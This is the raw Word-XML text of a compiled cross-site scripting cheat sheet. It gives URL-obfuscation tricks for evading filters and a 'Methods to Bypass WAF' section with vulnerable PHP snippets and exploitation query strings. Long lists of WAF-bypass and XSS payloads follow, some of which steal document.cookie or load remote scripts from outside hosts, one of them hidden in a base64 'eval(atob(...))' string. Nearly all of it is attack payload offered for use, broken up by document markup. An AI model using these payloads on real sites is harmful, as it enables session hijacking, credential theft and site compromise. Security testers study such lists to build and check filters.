string evasion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lastRenderedPageBreak/>
        <w:t>Assuming "http://www.google.com/" is pro grammatically disallowed:</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IP versus hostname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HREF="http://66.102.7.147/"&gt;XSS&lt;/A&gt;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URL encoding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HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"&gt;XSS&lt;/A&gt;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Dword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(Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details):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HREF="http://1113982867/"&gt;XSS&lt;/A&gt;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Hex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total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required):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HREF="http://0x42.0x0000066.0x7.0x93/"&gt;XSS&lt;/A&gt;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Octal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Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...: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HREF="http://0102.0146.0007.00000223/"&gt;XSS&lt;/A&gt;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Base64 encoding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onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))"&gt;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Mixed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Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes: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tt</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>p://6</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>6.000146.0x7.147/"&gt;XSS&lt;/A&gt;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lastRenderedPageBreak/>
        <w:t>Protocol resolution bypass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translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.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HREF="//www.google.com/"&gt;XSS&lt;/A&gt;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Google "feeling lucky" part 1.</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Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatenate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0.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HREF="//google"&gt;XSS&lt;/A&gt;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Google "feeling lucky" part 2.</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uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0: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HREF="http://ha.ckers.org@google"&gt;XSS&lt;/A&gt;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Google "feeling lucky" part 3.</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uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"):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HREF="http://google:ha.ckers.org"&gt;XSS&lt;/A&gt;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Removing cnames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When combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):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Extra dot for absolute DNS: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&lt;A HREF="http://www.google.com./"&gt;XSS&lt;/A&gt;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JavaScript link location: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HREF="javascript:document.location='http://www.google.com/'"&gt;XSS&lt;/A&gt;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Content replace as attack vector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Assuming "http://www.google.com/" is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: "java&amp;#x09;script:" was converted into "java script:", which renders in IE, Netscape 8.1+ in secure site mode and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HREF="http://www.google.com/ogle.com/"&gt;XSS&lt;/A&gt;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Character escape sequences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All the possible combinations of the character "&lt;" in HTML and JavaScript. Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.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\u003c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\u003C</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0"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
        </w:rPr>
        <w:t>Methods to Bypass WAF – Cross-Site Scripting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General issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>• Stored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an attacker managed to push XSS through the filter, WAF wouldn’t be able to prevent the attack conduction.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>• Reflected XSS in Javascript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Example: &lt;script&gt; ... setTimeout(\"writetitle()\",$_GET[xss]) ... &lt;/script&gt;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Exploitation: /?xss=500); alert(document.cookie);//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DOM-based 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Example: &lt;script&gt; ... eval($_GET[xss]); ... &lt;/script&gt;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Exploitation: /?xss=document.cookie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b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XSS via request Redirection.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>• Vulnerable code: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header('Location: '.$_GET['param']);</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As well as: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header('Refresh: 0; URL='.$_GET['param']);</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This request will not pass through the WAF:</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 xml:space="preserve"> /?param=javascript:alert(document.cookie)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This request will pass through the WAF and an XSS attack will be conducted in certain browsers.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/?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>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b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WAF ByPass Strings for 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 x onerror = "javascript: window.onerror = alert; throw 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&lt;Video&gt; &lt;source onerror = "javascript: alert (XSS)"&gt;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value = "XSS" type = text&gt;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&lt;applet code="javascript:confirm(document.cookie);"&gt;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&lt;isindex x="javascript:" onmouseover="alert(XSS)"&gt;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"&gt;&lt;img src="x:x" onerror="alert(XSS)"&gt;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"&gt;&lt;iframe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&lt;isindex type=image src=1 onerror=alert(XSS)&gt;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src=x:alert(alt) onerror=eval(src) alt=0&gt;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src="x:gif" onerror="window['al\u0065rt'](0)"&gt;&lt;/img&gt;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&lt;iframe/src="data:text/html,&lt;svg onload=alert(1)&gt;"&gt;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content="&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)" http-equiv="refresh"/&gt;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&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open('</w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00DC1572">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.google.com/'</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&gt;&lt;/script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content="0;url=javascript:confirm(1)"&gt;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src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;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&lt;form&gt;&lt;a href="javascript:\u0061lert(1)"&gt;X</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&lt;/script&gt;&lt;img/*%00/src="worksinchrome&amp;colon;prompt(1)"/%00*/onerror='eval(src)'&gt;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&lt;style&gt;//*{x:expression(alert(/xss/))}//&lt;style&gt;&lt;/style&gt;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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>On Mouse Over</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>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=_=" title="onerror='prompt(1)'"&gt;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aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script:&amp;#97lert(1)&gt;ClickMe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x&gt; alert(1) &lt;/script 1=2</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&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME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&lt;input/onmouseover="javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;"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&lt;iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"&gt;&lt;/iframe&gt;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&lt;OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"&gt;&lt;PARAM NAME="DataURL" VALUE="javascript:alert(1)"&gt;&lt;/OBJECT&gt; </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Filter Bypass Alert Obfuscation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a=alert,a(1)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[1].find(alert)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top[/al/.source+/ert/.source](1)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al\u0065rt(1)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top[‘al\145rt’](1)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top[‘al\x65rt’](1)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top[8680439..toString(30)](1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B0D69" w:rsidRDefault="003B0D69"/>
    <w:p w:rsidR="00DC1572" w:rsidRDefault="00DC1572">
      <w:r>
        <w:t xml:space="preserve">Addit </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Additional XSS Payloads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&lt;script&gt;alert(123);&lt;/script&gt;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&lt;script&gt;alert(123)&lt;/script&gt;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&lt;script&gt;alert("hellox worldss");&lt;/script&gt;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&lt;script&gt;alert(“XSS”)&lt;/script&gt;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&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;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SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;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 xml:space="preserve">&lt;IMG SRC=javascript:alert(‘XSS’)&gt;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src=xss onerror=alert(1)&gt;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%00 src="&amp;Tab;javascript:prompt(1)&amp;Tab;"%00&gt;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&lt;svg&gt;&lt;style&gt;{font-family&amp;colon;'&lt;iframe/onload=confirm(1)&gt;'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&lt;input/onmouseover="javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;"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&lt;sVg&gt;&lt;scRipt %00&gt;alert&amp;lpar;1&amp;rpar;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&lt;img/src=`%00` onerror=this.onerror=confirm(1)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&lt;form&gt;&lt;isindex formaction="javascript&amp;colon;confirm(1)"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src=`%00`&amp;NewLine; onerror=alert(1)&amp;NewLine;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&lt;script/&amp;Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&amp;Tab;&gt;&lt;/script&gt;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5-0*3+9/3=&gt;prompt(1)&lt;/ScRipT giveanswerhere=?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&lt;iframe/src="data:text/html;&amp;Tab;base64&amp;Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="&gt;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/*%00*/&gt;/*%00*/alert(1)/*%00*/&lt;/script /*%00*/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&amp;#34;&amp;#62;&lt;h1/onmouseover='\u0061lert(1)'&gt;%00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&lt;iframe/src="data:text/html,&lt;svg &amp;#111;&amp;#110;load=alert(1)&gt;"&gt;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content="&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)" http-equiv="refresh"/&gt;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&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open('https://www.google.com/')&gt;&lt;/script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&lt;svg&gt;&lt;script x:href='https://dl.dropbox.com/u/13018058/js.js'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content="0;url=javascript:confirm(1)"&gt;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&lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;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&lt;form&gt;&lt;a href="javascript:\u0061lert&amp;#x28;1&amp;#x29;"&gt;X</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&lt;/script&gt;&lt;img/*%00/src="worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;"/%00*/onerror='eval(src)'&gt;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&lt;img/&amp;#09;&amp;#10;&amp;#11; src=`~` onerror=prompt(1)&gt;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&lt;form&gt;&lt;iframe &amp;#09;&amp;#10;&amp;#11; src="javascript&amp;#58;alert(1)"&amp;#11;&amp;#10;&amp;#09;;&gt;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href="data:application/x-x509-user-cert;&amp;NewLine;base64&amp;NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&amp;#09;&amp;#10;&amp;#11;&gt;X&lt;/a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http://www.google&lt;script .com&gt;alert(document.location)&lt;/script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&lt;a&amp;#32;href&amp;#61;&amp;#91;&amp;#00;&amp;#93;"&amp;#00; onmouseover=prompt&amp;#40;1&amp;#41;&amp;#47;&amp;#47;"&gt;XYZ&lt;/a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&lt;img/src=@&amp;#32;&amp;#13; onerror = prompt('&amp;#49;')</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&lt;style/onload=prompt&amp;#40;'&amp;#88;&amp;#83;&amp;#83;'&amp;#41;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^__^&gt;alert(String.fromCharCode(49))&lt;/script ^__^</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 &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(document.location)/**/&lt;/script &amp;#32;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&amp;#00;&lt;/form&gt;&lt;input type&amp;#61;"date" onfocus="alert(1)"&gt;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&lt;form&gt;&lt;textarea &amp;#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&amp;#x28;1&amp;#x29;'&gt;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/***/&gt;/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/&lt;/script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srcdoc='&amp;lt;body onload=prompt&amp;lpar;1&amp;rpar;&amp;gt;'&gt;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href="javascript:void(0)" onmouseover=&amp;NewLine;javascript:alert(1)&amp;NewLine;&gt;X&lt;/a&gt;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~~~&gt;alert(0%0)&lt;/script ~~~&gt;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&lt;style/onload=&amp;lt;!--&amp;#09;&amp;gt;&amp;#10;alert&amp;#10;&amp;lpar;1&amp;rpar;&gt;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&lt;///style///&gt;&lt;span %2F onmousemove='alert&amp;lpar;1&amp;rpar;'&gt;SPAN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&lt;img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&amp;Tab;prompt(1)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&amp;#34;&amp;#62;&lt;svg&gt;&lt;style&gt;{-o-link-source&amp;colon;'&lt;body/onload=confirm(1)&gt;'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&amp;#13;&lt;blink/&amp;#13; onmouseover=pr&amp;#x6F;mp&amp;#116;(1)&gt;OnMouseOver {Firefox &amp;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&lt;marquee onstart='javascript:alert&amp;#x28;1&amp;#x29;'&gt;^__^</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&lt;div/style="width:expression(confirm(1))"&gt;X&lt;/div&gt; {IE7}</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&lt;iframe/%00/ src=javaSCRIPT&amp;colon;alert(1)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//&lt;form/action=javascript&amp;#x3A;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;&lt;input/type='submit'&gt;//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/*iframe/src*/&lt;iframe/src="&lt;iframe/src=@"/onload=prompt(1) /*iframe/src*/&gt;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&lt;script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'&gt; //|\\ &lt;/script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&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src&amp;#x3A;'&lt;style/onload=this.onload=confirm(1)&gt;'&lt;/font&gt;/&lt;/style&gt;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&lt;a/href="javascript:&amp;#13; javascript:prompt(1)"&gt;&lt;input type="X"&gt;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&lt;/plaintext\&gt;&lt;/|\&gt;&lt;plaintext/onmouseover=prompt(1)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&lt;/svg&gt;''&lt;svg&gt;&lt;script 'AQuickBrownFoxJumpsOverTheLazyDog'&gt;alert&amp;#x28;1&amp;#x29;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href="javascript&amp;colon;\u0061&amp;#x6C;&amp;#101%72t&amp;lpar;1&amp;rpar;"&gt;&lt;button&gt;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onmouseover='alert&amp;lpar;1&amp;rpar;'&gt;DIV&lt;/div&gt;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style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"&gt;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href="jAvAsCrIpT&amp;colon;alert&amp;lpar;1&amp;rpar;"&gt;X&lt;/a&gt;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src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"&gt;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data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"&gt;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&lt;var onmouseover="prompt(1)"&gt;On Mouse Over&lt;/var&gt;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href=javascript&amp;colon;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;Click Here&lt;/a&gt;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=_=" title="onerror='prompt(1)'"&gt;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&lt;%&lt;!--'%&gt;&lt;script&gt;alert(1);&lt;/script --&gt;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src="data:text/javascript,alert(1)"&gt;&lt;/script&gt;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&lt;iframe/src \/\/onload = prompt(1)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&lt;iframe/onreadystatechange=alert(1)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&lt;svg/onload=alert(1)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value=&lt;&gt;&lt;iframe/src=javascript:confirm(1)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type="text" value=`` &lt;div/onmouseover='alert(1)'&gt;X&lt;/div&gt;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http://www.&lt;script&gt;alert(1)&lt;/script .com</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mp;NewLine;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;v&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;s&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;c&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;i&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;p&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;T</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;colon;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;l&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;e&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;28&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;1&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;%29&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&lt;svg&gt;&lt;script ?&gt;alert(1)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src=j&amp;Tab;a&amp;Tab;v&amp;Tab;a&amp;Tab;s&amp;Tab;c&amp;Tab;r&amp;Tab;i&amp;Tab;p&amp;Tab;t&amp;Tab;:a&amp;Tab;l&amp;Tab;e&amp;Tab;r&amp;Tab;t&amp;Tab;%28&amp;Tab;1&amp;Tab;%29&gt;&lt;/iframe&gt;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src=`xx:xx`onerror=alert(1)&gt;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content="0;javascript&amp;colon;alert(1)"/&gt;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&lt;math&gt;&lt;a xlink:href="//jsfiddle.net/t846h/"&gt;click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code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always&gt;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 contentScriptType=text/vbs&gt;&lt;script&gt;MsgBox+1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href="data:text/html;base64_,&lt;svg/onload=\u0061&amp;#x6C;&amp;#101%72t(1)&gt;"&gt;X&lt;/a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&lt;iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE&gt;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&lt;script&gt;~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')&lt;/script U+</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&lt;script/src="data&amp;colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"&gt;&lt;/script a=\u0061 &amp; /=%2F</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&lt;script/src=data&amp;colon;text/j\u0061v\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script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data=javascript&amp;colon;\u0061&amp;#x6C;&amp;#101%72t(1)&gt;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&lt;script&gt;+-+-1-+-+alert(1)&lt;/script&gt;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&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#10alert(1)&gt;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itworksinallbrowsers&gt;/*&lt;script* */alert(1)&lt;/script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?itworksonchrome?\/onerror = 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&lt;svg&gt;&lt;script&gt;//&amp;NewLine;confirm(1);&lt;/script &lt;/svg&gt;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&lt;svg&gt;&lt;script onlypossibleinopera:-)&gt; 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aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&amp;#x3A;&amp;#97lert(1)&gt;ClickMe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x&gt; alert(1) &lt;/script 1=2</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&lt;div/onmouseover='alert(1)'&gt; style="x:"&gt;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&lt;--`&lt;img/src=` onerror=alert(1)&gt; --!&gt;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&lt;script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)&gt;&lt;/script&gt;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style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)"&gt;x&lt;/button&gt;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"&gt;&lt;img src=x onerror=window.open('https://www.google.com/');&gt;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&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME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&lt;math&gt;&lt;a xlink:href="//jsfiddle.net/t846h/"&gt;click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data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;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src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"&gt;&lt;/iframe&gt;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&lt;a href="data:text/html;blabla,&amp;#60&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#32&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#115&amp;#116&amp;#101&amp;#114&amp;#110&amp;#101&amp;#102&amp;#97&amp;#109&amp;#105&amp;#108&amp;#121&amp;#46&amp;#110&amp;#101&amp;#116&amp;#47&amp;#102&amp;#111&amp;#111&amp;#46&amp;#106&amp;#115&amp;#34&amp;#62&amp;#60&amp;#47&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#62&amp;#8203"&gt;Click Me&lt;/a&gt;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&lt;SCRIPT&gt;String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)&lt;/SCRIPT&gt;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‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–&gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;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“””&gt;&lt;SCRIPT&gt;alert(“XSS”)&lt;/SCRIPT&gt;”&gt;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SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;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 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SRC=”jav&amp;#x09;ascript:alert(‘XSS’);”&gt;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%253cscript%253ealert(1)%253c/script%253e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“&gt;&lt;s”%2b”cript&gt;alert(document.cookie)&lt;/script&gt;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foo&lt;script&gt;alert(1)&lt;/script&gt;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&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;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SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;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0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041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SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;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BACKGROUND=”javascript:alert(‘XSS’)”&gt;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TYPE=”IMAGE”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src=http://ha.ckers.org/scriptlet.html &lt;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javascript:alert("hellox worldss")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src=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;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&lt;"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharC</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt;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SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;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SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" 